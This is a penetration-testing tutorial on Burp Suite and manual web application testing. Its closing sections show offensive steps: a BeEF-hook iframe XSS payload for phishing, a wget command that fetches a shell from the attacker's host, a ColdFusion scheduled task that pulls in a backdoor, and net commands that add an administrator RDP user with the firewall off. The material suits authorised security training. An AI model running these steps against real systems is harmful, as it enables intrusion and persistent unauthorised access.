
Credits: PrimalSec

Web Application Testing Overview:

Web application vulnerabilities pose a significant amount of risk to enterprise systems. Many of these vulnerabilities are the result of a lack of input sanitization. In short, web applications accept some form of input from the user and may process that information to serve content or to retrieve data from other parts of the system. If that input isn’t properly sanitized, an attacker can send non-standard input to misuse the web application. This post focuses heavily on Burp Suite and introduces how it can be leveraged to conduct assessments of web applications.

Burp Suite Overview:

Burp Suite has a large array of features, including but not limited to:

  • Interception Proxy: Designed to give the user control over requests sent to the server.
  • Repeater: The ability to rapidly repeat and modify specific requests.
  • Intruder: Allows automation of custom attacks and payloads.
  • Decoder: Decodes and encodes strings to and from various formats (URL, Base64, HTML, etc.).
  • Comparer: Highlights differences between requests and responses.
  • Extender: An API to extend Burp’s functionality, with many free extensions available via the BApp Store.
  • Spider and Discover Content: The spider crawls links on a web application, while Discover Content can be used to dynamically enumerate unlinked content.
  • Scanner (Pro only): An automated scanner that checks for web application vulnerabilities (XSS, SQLi, command injection, file inclusion, etc.).

Getting Started:

Detailed help documentation on Burp can be found here:

http://portswigger.net/burp/help/suite_gettingstarted.html

Burp Suite can be launched from the CLI using the java -jar command. You can allocate the amount of memory you want Burp to use with the -Xmx switch:

java -jar -Xmx1024m /path/to/burp.jar

b_1

Like most interception proxies, Burp is driven through a GUI, but there are options to automate Burp from the CLI by leveraging the Extender feature.

Once Burp Suite is started, it is recommended to define your target host in the scope. This allows you to control what is displayed in the site map and what other Burp features act on. Scope can be defined by adding a target host, IP address, or network range:

b_2

The Proxy tab displays the details related to Burp’s proxy, intercept options, and HTTP request history. Below you can see that “Intercept is on” so any request made from the browser will need to be manually forwarded through the Burp proxy:

b_3

The intercept feature will intercept ALL traffic sent from the browser. Browser extensions such as FoxyProxy can be used to blacklist/whitelist specific URLs and IPs so that they bypass the Burp intercept.

With Burp’s scope and proxy configured, you can begin to browse the web application through the proxy; as you do, the Site Map under the Target tab begins to populate. From this view you get an overview of the directory structure and resources within the web application. By right-clicking a URL or resource you have several options to invoke additional functionality, such as running Burp’s spider or performing an active scan:

b_4

Quick Tip: To make it easier to focus on just the target web application, you can click the “Filter:” menu and choose to only show content that is within scope:

b_5

Activating Burp’s spider will crawl the linked content on the web application to a depth of 5 links by default; these options can be configured under the “Spider” tab. As you interact with the web application, all of the requests and responses are logged under the “Proxy” tab. You can highlight a request to help it stand out, and even leave comments for later analysis:

b_6

Burp’s Engagement Tools:

Burp Suite offers a number of useful features under its Engagement Tools (right-click the site in the Target view > Engagement Tools).  From there you can choose “Analyze Target”, which gives you an idea of link count, parameter count, and static vs. dynamic content.  Knowing this information can be very useful for scoping the assessment: the more links, parameters, and dynamic content, the more injection points there are to fuzz.

In the screenshot below you can see some of the other features, like “Schedule Task”, which lets you schedule Burp Suite to run an active scan.  This feature is especially useful if the client wants the automated testing performed at odd hours of the day.

engagement_tools

Discovering Unlinked Content:

One issue you’ll face when performing web application tests is enumeration of unlinked content. This can be time consuming since it largely relies on brute-force logic: make a request and see if the resource is there on the server. An example could be a “/tmp/” directory that isn’t linked anywhere in the web application, but whose content is served if a request is made. To solve this problem we have several options:

  • Leverage Burp’s Discover Content feature.
  • Leverage another scanner that checks for some default resources (Nikto, w3af, ZAP, etc.).
  • Leverage DirBuster or Burp’s intruder to brute force resources based on a static list.

All of these methods can be very time consuming and may not actually find anything, so depending on the testing window and scope you may not be able to let DirBuster run for days. Normally this runs in the background while additional manual testing is performed.
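To illustrate the brute-force logic these tools rely on, here is a minimal Python sketch using the requests library; the target URL and wordlist path are placeholders, not values from the original walkthrough:

# Minimal unlinked-content brute forcer (illustrative sketch only)
import requests

target = "http://target.example.com"   # hypothetical target
wordlist = "common_dirs.txt"           # hypothetical wordlist, one word per line

with open(wordlist) as f:
    for word in f:
        url = "{0}/{1}/".format(target, word.strip())
        try:
            response = requests.get(url, timeout=5)
        except requests.RequestException:
            continue
        # Anything other than a 404 is worth a closer manual look
        if response.status_code != 404:
            print(response.status_code, url)

Tools like DirBuster and Burp’s Intruder apply the same idea with threading, smarter response matching, and much larger word lists.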

Below is an example of invoking Burp’s Discover Content feature which attempts to dynamically enumerate unlinked content:

b_7

Burp’s Decoder and Comparer:

When you begin testing web applications you’ll find that you very often need to decode or encode strings into different formats. This can be especially useful when trying to bypass simple filters that are meant to prevent web application attacks. Below is an example of Burp’s Decoder performing URL encoding, although several additional options exist:

b_8
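The same transformations can be reproduced outside of Burp with a few lines of Python; this is purely an illustrative sketch and the payload string is arbitrary:

# URL and Base64 encoding/decoding, similar to what Burp's Decoder does
import base64
from urllib.parse import quote, unquote

payload = "<script>alert(1)</script>"
encoded = quote(payload)                           # URL-encode
print(encoded)
print(unquote(encoded))                            # URL-decode back to the original
b64 = base64.b64encode(payload.encode()).decode()  # Base64-encode
print(b64)
print(base64.b64decode(b64).decode())              # Base64-decode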

Burp’s Comparer feature allows you to quickly compare requests or responses to highlight the differences:

b_9
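Conceptually, Comparer performs a diff of two requests or responses. A rough Python equivalent using the standard difflib module would look like this (the two response strings below are made-up placeholders):

# Diff two HTTP responses, roughly what Burp's Comparer highlights
import difflib

response_a = "HTTP/1.1 200 OK\nContent-Length: 42\n\nHello user"    # placeholder
response_b = "HTTP/1.1 200 OK\nContent-Length: 45\n\nHello admin"   # placeholder

for line in difflib.unified_diff(response_a.splitlines(),
                                 response_b.splitlines(),
                                 fromfile="response_a",
                                 tofile="response_b",
                                 lineterm=""):
    print(line)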

Burp’s Extender:

The Extender feature offers a powerful API to develop additional functionality with Burp using a scripting language. Many of the extensions are written in Python, and a offered for free via Burp’s App store. One very useful extension is Carbonator, which allows you to fully automate Burp from Spider > Scan > Report from the command-line. Below is a quick screen shot of some of the extensions that are available via the app store:

b_10
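Python extensions run under Jython inside Burp. As a rough idea of what the Extender API looks like, a minimal extension that simply registers itself would be along these lines (a sketch using the IBurpExtender interface, not a working example of Carbonator):

# Minimal Burp extension skeleton, loaded via Extender > Extensions (Jython required)
from burp import IBurpExtender

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        # Name the extension and write a message to Burp's output pane
        callbacks.setExtensionName("Minimal example extension")
        callbacks.printOutput("Extension loaded")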

Burp’s Intruder:

Another option is leveraging Burp’s Intruder, which takes a request and allows the user to define injection points that can be modified with different payloads. One common use case is to iterate through parameter values in a request to see how the web application responds; for example, with GET /product.php?item=1 you might have Intruder check the values 1-1000 and compare the differences in the responses. You can also define the resource being requested as the position to modify. Below we will demonstrate this by iterating through a common directory word list:

  1. Select a request and choose “Send to Intruder”; this will open the following window under the “Intruder” tab. The highlighted area is the section of the request that will be brute forced with the “Sniper” attack type, which iterates through the configured list and makes a request for each entry:

b_11

  2. Next, under the “Payloads” tab, you can load a word list to be used for the brute-force discovery:

b_12

  3. To start the attack, select “Intruder > Start Attack”. The results window shows the requests made and the HTTP status codes. As we can see, we were able to enumerate some additional resources that were missed by the spider:

b_13
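Coming back to the parameter-iteration use case mentioned earlier (GET /product.php?item=1), the same idea can be sketched outside of Intruder with a short Python loop; the URL, parameter name, and length threshold here are placeholders for illustration:

# Iterate a numeric parameter and flag responses that differ from the baseline
import requests

base_url = "http://target.example.com/product.php"   # hypothetical target
baseline_length = None

for item in range(1, 1001):
    response = requests.get(base_url, params={"item": item}, timeout=5)
    if baseline_length is None:
        baseline_length = len(response.text)          # first response is the baseline
    if abs(len(response.text) - baseline_length) > 100:
        print(item, response.status_code, len(response.text))

Intruder’s “Sniper” attack type with a numeric payload set accomplishes the same thing, with sortable columns for status code and response length.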

In addition to using Burp, it is recommended to run another scanner in the background to check for default configurations and resources. Below is an example of Nikto, but additional scanners to consider include ZAP, w3af, and Grendel-Scan. As we can see, Nikto found additional interesting things to investigate further, such as “/tmp/” and “/test/”:

b_14

Burp’s Automated Scanner:

After initial reconnaissance and mapping, we want to start an active scan, which will have Burp test the discovered content for various vulnerabilities. This largely works by Burp injecting content (HTML, JavaScript, SQL syntax, OS commands, etc.) and monitoring how the web application responds. As with any web application vulnerability scanner, Burp will report a number of false positives that require manual validation. To start the active scanner, right-click the URL or resource in the site map and select “Actively scan this host”; this will open the following active scanning wizard:

b_15

Web application scan times can vary greatly depending on the application: automated scans can range from a few hours to several days in some instances. The link count enumerated during spidering is a good indicator of the potential duration of the scan. The window above shows 1515 links enumerated, though very few have parameters for testing input. Links without parameters reduce the number of requests that Burp makes per link, so the scan time is lower.

Another key factor to consider when actively scanning a web application is form submission. When you actively scan the web application, you may generate a large number of logs, tickets, jobs, etc., depending on the application and the functionality it provides to the user. This should be closely monitored to avoid causing a Denial of Service (DoS) condition if that is not in scope for the assessment.

Once the scan has started, the results and status will be visible by navigating to the “Scanner” tab within Burp:

b_16

As results begin to populate, you can start reviewing them. Below we can see that Burp has reported multiple findings to investigate further:

b_17

Analyzing Scan Results and Manual Testing:

It is often a good idea to validate the findings from a Burp scan to weed out false positives and to fully understand the results. Start by selecting a finding, for example “Cross-site scripting (reflected)”, then choose the request and response to see the detailed information that influenced Burp’s interpretation of the vulnerability. One of the first things to check with XSS is to repeat the request in the browser to see if the script runs. You can do that by right-clicking in the request body and choosing “Request in browser”:

b_18

Seeing the response in a browser can be helpful when determining if the finding was a true positive. Since XSS findings are related to code executing in a client browser, it’s important to validate the findings prior to relying on logic from the scanner.

Another frequently used feature of Burp is “Repeater”, commonly used when validating results or manually searching for additional findings. Simply right-click the request body and select “Send to Repeater”:

b_19

Within the Repeater interface, you can modify the request and quickly resend it to the web application:

b_20

Reflected XSS can be quickly tested by injecting some HTML/JavaScript into a parameter that is parsed without input validation. Below is an example of modifying the XSS payload to a simple alert(“XSS”) call:

b_22

For a practical application of reflected XSS, you would likely leverage an iframe payload in combination with spear phishing. Below is an example XSS payload you could use in place of “alert()”, so that it loads a third-party resource serving a client-side exploit or BeEF hook:

<iframe height="0" width="0" src="<BeEF_hook>"></iframe>

b_21

BeEF is a powerful way to take control over a victim browser through the use of JavaScript. Above you can see a victim browser that was hooked with BeEF using an XSS vulnerability. BeEF provides loads of functionality to perform on a victim browser, and even ties into Metasploit to deliver exploits.

XSS is often overlooked in web application security because it needs to be combined with something else to reach the end goal of a shell. One thing to note, though, is that XSS shows the web application isn’t properly filtering user input, and this could be the first sign of many other vulnerabilities.

In this instance, we validated the XSS by sending the request to Repeater, modifying the payload, and viewing the response in our browser, and we showed how XSS could be leveraged to control a victim browser. Another nice feature of Burp’s scan results is that you can modify the risk associated with a finding. You will undoubtedly come across some false positives when analyzing scan results, so Burp gives the user the ability to mark a finding as a “False Positive”:

b_23

Burp is capable of fuzzing input with a variety of payloads, though it does miss some version specific vulnerabilities and configuration issues. This is common with any tool, and as a result, it is suggested to perform manual testing to validate results found by the tools as well as enumerate additional vulnerabilities within the web application.

A good first step in manual testing is enumerating the technologies in use by the web application. The specific software and version information can lead you to additional resources to request or vulnerabilities that might be present. Whatweb is a tool that is great at quickly giving you an idea of the technologies in use. Below we can see the command-line syntax for whatweb as well as the output:

b_24
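As a point of reference, basic whatweb usage is simply the tool name followed by a target (the URL here is a placeholder):

whatweb http://target.example.com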

In practice we would likely have run whatweb well before running a full Burp scan, but we can see some very interesting information in its output. In this instance, we see a ColdFusion web application, which gives us a starting point for manual testing. Now that ColdFusion has been identified, it is logical to check for the presence of administrative resources, such as “/CFIDE/administrator/”.

Manual Testing:

Burp can also be a great tool for performing manual testing on the web application. Normally this type of testing is performed throughout the assessment, and as more information comes out of the various scans it feeds further manual testing. The topic of manual testing can, and does, fill books; this post will focus on the very basics. As you begin to browse the web application and review tool output, keep the following in mind:

  1. Enumerate and research all the software versions you can: ColdFusion, WordPress, SharePoint, etc.
  • Research each version for known vulnerabilities and common misconfigurations.
  • Attempt to request additional resources associated with the technologies in use that might not be linked by the web application.
  2. Is the web application leveraging user input?
  • Try modifying parameter values, HTTP header fields, cookies, etc. to see how the web application responds.
  3. If you suspect some part of your request is presented on the screen, test for XSS. For example, if you browse the page and notice that your User-Agent is visible, attempt to replace your User-Agent with some HTML/JavaScript to test for XSS (“<script>alert(1)</script>”).
  4. Is your request being used to perform a query against a database? For example, if you notice a parameter called “id” that takes a numeric value, try placing a single quote ' or a double quote " to attempt to generate a database error. This type of testing can lead to identifying the presence of SQL injection (a rough sketch of this kind of probing follows the list).
  5. Is the web application leveraging any input to execute a command? Attempt to modify your input to append an additional command to the request and see if it is processed by the web application.
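As a rough illustration of points 3 and 4 above, a few lines of Python can probe a parameter for reflected input and for database error strings; the URL, parameter name, and error signatures are placeholders, and any hit still needs manual validation:

# Quick-and-dirty probes for reflected input and SQL error messages
import requests

url = "http://target.example.com/product.php"   # hypothetical injection point
marker = "xss9137probe"                          # unique string to look for in the response

# Reflection check: if the marker comes back verbatim, follow up with real XSS payloads
response = requests.get(url, params={"id": marker}, timeout=5)
if marker in response.text:
    print("Input is reflected -- test XSS payloads manually")

# SQL error check: a stray single quote that triggers a database error deserves a closer look
response = requests.get(url, params={"id": "1'"}, timeout=5)
for signature in ("SQL syntax", "ODBC", "ORA-", "mysql_fetch"):
    if signature in response.text:
        print("Possible SQL error triggered:", signature)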

Obtain a Shell:

Web shells come in a variety of file formats and levels of functionality.  You may be able to land a PHP shell (raw shell, Meterpreter, etc.), a raw netcat shell, an .asp shell, a .jsp shell, and so on.  The type of shell that can be utilized depends on the technology in use and its configuration.  For example, if you gained access to an Apache Tomcat manager GUI you might be able to deploy a WAR backdoor.  If you find an RFI vulnerability on a server running IIS, you may try to upload an .asp shell.

It’s also common that when you gain a shell, you are running with the permissions of the web application’s service account, which might not be able to write to or execute from the current working directory.  For these reasons you may need to place the web shell in the /tmp/ directory (wget -O /tmp/shell.py http://<yourIp>/shell.py).  With regards to Remote Command Execution (RCE), it’s also very common to need a null byte (%00) at the end of the request.

Then there are situations where a misconfiguration can lead to landing a web shell. Below we can see that we have access to the ColdFusion management interface, which allows us to schedule a task and upload a (.cfm) backdoor. This is a critical finding that many automated scanning tools completely miss:
b_25

This example is not likely to occur in the real world, but the point is to enumerate the software versions leveraged by the web application and then research them for vulnerabilities. ColdFusion is rife with directory traversal and authentication bypass vulnerabilities. Creative Google searching and checking exploit research resources like exploit-db can go a long way in this phase of testing.

Since we have access to the management interface, the next logical step is to schedule a task that pulls over a (.cfm) backdoor and publishes it on the web application. Scheduled tasks in ColdFusion are found under the Debugging Options menu:

b_26

Next, you’ll want to stand up a quick web server on another host so the victim web application can pull the backdoor over. Python is very handy for this:

python -m SimpleHTTPServer 80
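(On Python 3 the equivalent one-liner is python3 -m http.server 80.)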

We can then configure and run the scheduled task to pull over and publish the backdoor. You will want to be sure to check the “Publish” checkbox, and you can enumerate the file system directory structure from the server settings summary on the left hand side:

b_27

After running the scheduled task, you can watch your Python web server to see the victim server request the backdoor. Then you can navigate to the resource on the web application and interact with the backdoor to execute commands on the OS:

b_28

We can execute a “whoami” command to see what privileges we have on the web application:

b_29

Executing as “nt authority\system” means we can begin to make some modifications, such as adding a user and turning off the firewall. We will add a user and grant it access with the following commands:

net user jobin password /ADD

net localgroup Administrators jobin /ADD

net localgroup "Remote Desktop Users" jobin /ADD
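The firewall step is not shown in the original screenshots, but on a typical Windows target the built-in firewall can be switched off with a command along these lines:

netsh advfirewall set allprofiles state off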

Now, with the firewall disabled and the user added through the (.cfm) shell, we can RDP to the victim system for interactive access:

b_30

Conclusion:

A common source of web application vulnerabilities is a lack of user input sanitization. Web application scanners work by trying to take advantage of this, making requests that include code, SQL syntax, references to local/remote resources, and so on. Web application testing is a very deep topic; this post focused on the basics with an introduction to Burp Suite.
